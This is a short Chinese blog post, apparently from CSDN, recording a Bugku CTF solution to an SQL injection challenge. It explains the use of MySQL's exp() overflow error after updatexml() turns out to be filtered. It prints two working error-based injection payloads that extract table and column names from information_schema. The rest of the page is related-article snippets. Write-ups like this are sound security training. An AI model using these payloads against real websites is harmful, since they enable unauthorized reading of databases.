简单的sql注入之3 exp函数的使用

最新推荐文章于 2023-01-20 00:15:28 发布
最新推荐文章于 2023-01-20 00:15:28 发布
阅读量1.5k 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44077544/article/details/89955770
版权

bugku – 简单的sql注入之3

用 1‘试了试,报错,让后1“回显正常。应该是单引号。既然报错,就试了试updatexml()这个函数,但发现被过滤了,所以用exp()这个函数,这里附上一些常见的报错函数:https://www.cnblogs.com/wocalieshenmegui/p/5917967.html

给出payload:

表名:
?id=1' and exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))%23
字段名:
?id=1' and exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_schema=database())a))%23

在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

沐目_01
关注
专栏目录
SQL注入基础整理及Tricks总结1
08-03
联合查询(Union Query)是最常见的SQL注入手法之一,它利用了数据库系统允许将多个查询结果合并成一个结果集的特性。例如,假设存在一个查询语句`SELECT column FROM table WHERE condition`,攻击者可以通过在条件...
SqlServer函数大全十九:EXP(指数)函数
最新发布
yixiaobing的博客
03-09 910
SQL Server 中,EXP函数用于计算自然数 e 的指定次幂。e 是一个数学常数,其值约为 2.71828。EXP函数接受一个数值作为参数,并返回 e 的该数值次幂。
第五十四章 SQL函数 EXP
yaoxin521123的博客
02-15 2145
文章目录第五十四章 SQL函数 EXP大纲参数描述示例 第五十四章 SQL函数 EXP 返回数字的指数(自然对数的倒数)的标量数值函数。 大纲 {fn EXP(expression)} 参数 expression - 对数指数,数值表达式。 EXP返回NUMERIC或DOUBLE数据类型。如果表达式的数据类型为DOUBLE,则EXP返回DOUBLE;否则返回NUMERIC。 描述 Exp是指数函数e n,其中e是常数2.718281828。因此,要返回e的值,可以指定{fn exp(1)}。Exp是自
SQL常用函数
lyfvslw的专栏
01-29 506
以下的函数分别在mssqlserver和oracle中进行测试,只列出常用的函数,不列出具体用法.1,得到系统时间函数  mssqlserver getDate()  oracle           sysDate2, 提取串的组成部分  mssqlserver subString(coloum1,index,length)  oracle           subSt
sql server 数学函数浅析
yuewei19的专栏
02-17 532
(1)abs(数值表达式) 示例: select abs(-10.4) 返回 10.4 说明:返回指定数值表达式的绝对值(正值)   pi无参数 selectpi() 返回3.14159265358979 说明:返回π的值   cos(浮点表达式) selectcos(pi()/3)返回0.5 返回指定弧度的余弦值   sin(浮点表达式) selects
sql函数大全
zsd_fresh的博客
05-05 1万+
1.count函数函数将返回满足where条件子句中记录的个数 select count(*) from 表名 或者是这样写: select count(*) from 表名 where 条件 2.sum函数,返回某一列的所有数值的和 select sum(字段名) from 表名 3.avg函数,它可以返回某一列的平均值 select avg(字段名) from 表名 4.max函数,它可以返回某一列中的最大数值 select max(字段名) from 表名 5.min函数
Python实现SQL注入检测插件实例代码
09-19
随着互联网技术的迅速发展,Web应用程序面临着各种安全威胁,其中SQL注入是最常见也是最危险的一种攻击方式之一。为了保护Web应用程序免受此类攻击,开发人员经常需要借助自动化工具来进行SQL注入漏洞的检测与防范。...
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
最全干货SQL注入大合集
04-28
- 报错注入:使用`FLOOR()`、`EXTRACTVALUE()`、`UPDATEXML()`、`GEOMETRYCOLLECTION()`、`MULTIPOINT()`、`POLYGON()`、`MULTIPOLYGON()`、`LINESTRING()`、`MULTILINESTRING()`和`EXP()`等函数,结合用户函数如`...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入基础知识点 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造...
Sql注入思路及类型(持续更新ing)
xhx836161547的博客
12-28 741
不同类型SQL注入的原理以及步骤
SQL注入 | exp()函数报错
JacobTsang的博客
10-30 6218
0x01原理 当传递一个大于709的值时,函数exp()就会引起一个溢出错误。 mysql> select exp(709); +-----------------------+ | exp(709) | +-----------------------+ | 8.218407461554972e307 | +-----------------------+ 1 r...
编写sql注入最基础的exp
CC210231的博客
04-03 1556
下面直接上代码: 使用html编写: <!DOCTYPE html> <html > <head> <meta charset="UTF-8"> <title></title> </head> <body> <!-method根据实际情况选择,action属性中为提交的地址,name属性中为参数名,
sql注入分类及报错注入EXP
weixin_45626840的博客
01-20 682
sql注入分类原理,报错注入原理,EXP编写
SQL 细节知识积累
★(ChengKing)【夜战鹰】【产品级性能调优与故障诊断分析】★
11-06 5078
Transact_sql:  TRUNCATE TABLE test   //用于删除test表中的数据  CREATE FUNCTION        //创建用户自定义函数  ALTER FUNCTION         //语句修改  DROP FUNCTION          //除去用户定义函数  CREATE UNIQUE CLUSTERED INDEX client_id ON c
expsql 工作总结
阿城的博客
08-01 773
不要用OR ,用 in
oracle函数 exp()和ln()进行相乘
热门推荐
rockywu
12-07 1万+
SQL中每行数据相加十分简单,只需要使用SUM,但相乘得使用exp()和ln() 例如: SELECT  exp(sum(ln(col.buy_qty_due))) FROM customer_order_line col  WHERE col.order_no = 'S1210080279'
SQL SERVER 数学函数
景上 的博客
05-21 4921
--1、ABS(X)绝对值函数; SELECT ABS(-2.0),ABS(2); --2、PE()返回圆周率的函数; SELECT PI(); --3、SQRT(X)平方根函数; SELECT SQRT(9),SQRT(11);--4、RAND()和RAND(X)函数:返回一个随机浮点值n(0<=n<=1.0); SELECT RAND(),RAND(),RAND(); ----不带参数时生成的随
SQL注入模糊测试关键字大全
"该资源提供了一组用于SQL注入测试的FUZZ关键字字典,包括逻辑运算符、比较操作符、特殊字符、SQL语句关键字等,适用...在进行安全测试时,这些关键字可以组合使用,构建出复杂的SQL注入尝试,帮助识别潜在的安全风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值